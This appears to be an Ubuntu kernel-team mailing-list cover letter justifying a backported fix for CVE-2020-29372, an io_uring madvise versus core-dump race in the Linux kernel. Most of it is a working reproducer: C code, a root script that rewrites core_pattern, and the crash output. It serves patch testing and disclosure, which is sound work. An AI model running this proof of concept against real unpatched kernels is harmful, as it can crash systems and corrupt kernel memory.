[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

William Breathitt Gray william.gray at canonical.com
Fri Jan 8 08:41:24 UTC 2021


SRU Justification
=================

[Impact]

An issue was discovered in do_madvise in mm/madvise.c in the Linux
kernel before 5.6.8. There is a race condition between coredump
operations and the IORING_OP_MADVISE implementation, aka
CID-bc0c4d1e176e.

[Testing]

Jann Horn from Google Security Research has provided a root-only KASAN
reproducer:
<https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
You should also be able to hit the bug as a normal user, especially if
you use FUSE:

$ cat > coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>

/*
 * Core-dump pipe helper: drains standard input until end-of-file.
 *
 * Once more than 1 MiB has been consumed in total, it sleeps for two
 * seconds exactly once and then keeps reading. Installed as a
 * core_pattern pipe handler, this stalls the writer of the dump part-way
 * through (presumably to widen the race window being tested).
 *
 * Exits 0 on end-of-file; exits 1 via err() if read() fails.
 */
int main(void) {
  char buf[1024];
  size_t total = 0;
  bool slept = false;
  while (1) {
    /* read() returns ssize_t; keep the full width instead of narrowing to int. */
    ssize_t res = read(0, buf, sizeof(buf));
    if (res == -1) err(1, "read");
    if (res == 0) return 0;
    total += (size_t)res;
    /* Pause only once, right after crossing the 1 MiB mark. */
    if (total > 1024*1024 && !slept) {
      sleep(2);
      slept = true;
    }
  }
}
$ gcc -o coredump_helper coredump_helper.c
$ cat > set_helper.sh 
#!/bin/sh
# Register ./coredump_helper as the core dump pipe handler. The leading "|"
# must stay inside the quotes so it is written to core_pattern literally
# rather than being parsed by the shell as a pipeline.
echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
$ sudo ./set_helper.sh 
$ cat > dumpme.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

/*
 * SYSCHK(x): evaluate x once and yield its value.
 *
 * If the value equals -1 converted to the type of x, err(1, ...) is called
 * with the stringified expression as the message, which terminates the
 * program with exit status 1. Used in this file for both integer syscall
 * results and mmap() pointer results.
 *
 * Relies on GNU C statement expressions; __typeof__ is used instead of
 * typeof so the macro also builds in strict ISO modes such as -std=c11.
 */
#define SYSCHK(x) ({                    \
  __typeof__(x) syschk_res_ = (x);      \
  if (syschk_res_ == (__typeof__(x))-1) \
    err(1, "SYSCHK(" #x ")");           \
  syschk_res_;                          \
})


/*
 * Reproducer: queue a delayed IORING_OP_MADVISE through io_uring, then
 * crash on purpose so that the madvise can run while the core dump of this
 * process is still being written.
 *
 * Every setup call is wrapped in SYSCHK, so any failure exits with status 1.
 * On the success path the function never returns: the final store to
 * address 0 faults.
 */
int main(void) {
  /* 2 MiB anonymous private mapping, filled so the pages are populated. */
  void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
                           MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  memset(area, 'O', 1024*1024*2);
  /* Apply MADV_RANDOM to 256 pages starting one page into the mapping. */
  SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));

  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_SQ_RING));
  /* The completion ring is mapped but never read below. */
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_CQ_RING));
  struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                          MAP_SHARED, uring_fd,
                                          IORING_OFF_SQES));

  // prepare delayed madvise via uring
  /* Entry 0: one-second timeout, hard-linked to the entry that follows it. */
  struct timespec ts = { .tv_sec = 1 };
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_TIMEOUT,
    .flags = IOSQE_IO_HARDLINK,
    .len = 1,
    .addr = (unsigned long)&ts
  };
  /* Entry 1: MADV_NORMAL over 1 MiB starting 4096 bytes into the mapping. */
  sqes[1] = (struct io_uring_sqe) {
    // no ioprio, buf_index, off
    .opcode = IORING_OP_MADVISE,
    .addr = (unsigned long)area+1024*4/**1024*/,
    .len = 1024*1024,
    .fadvise_advice = MADV_NORMAL
  };
  /* Publish both entries in the submission index array and advance the tail. */
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  ((int*)(sq_ring + params.sq_off.array))[1] = 1;
  (*(int*)(sq_ring + params.sq_off.tail)) += 2;

  int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
                                 /*to_submit=*/2, /*min_complete=*/0,
                                 /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
  printf("submitted %d\n", submitted);

  /* Deliberate NULL store: the resulting fault triggers the core dump. */
  *(volatile char *)0 = 42;
}
$ gcc -o dumpme dumpme.c
$ ./dumpme 
submitted 2
Segmentation fault (core dumped)
$ 

[Regression Potential]

Regression potential is low. Changes affect only the do_madvise()
function, and consist of a simple mitigation: verifying that the mm is
still okay via mmget_still_valid().

[Miscellaneous]

Fix is already present in Groovy and Hirsute.

Linus Torvalds (1):
  mm: check that mm is still valid in madvise()

 mm/madvise.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

-- 
2.27.0




More information about the kernel-team mailing list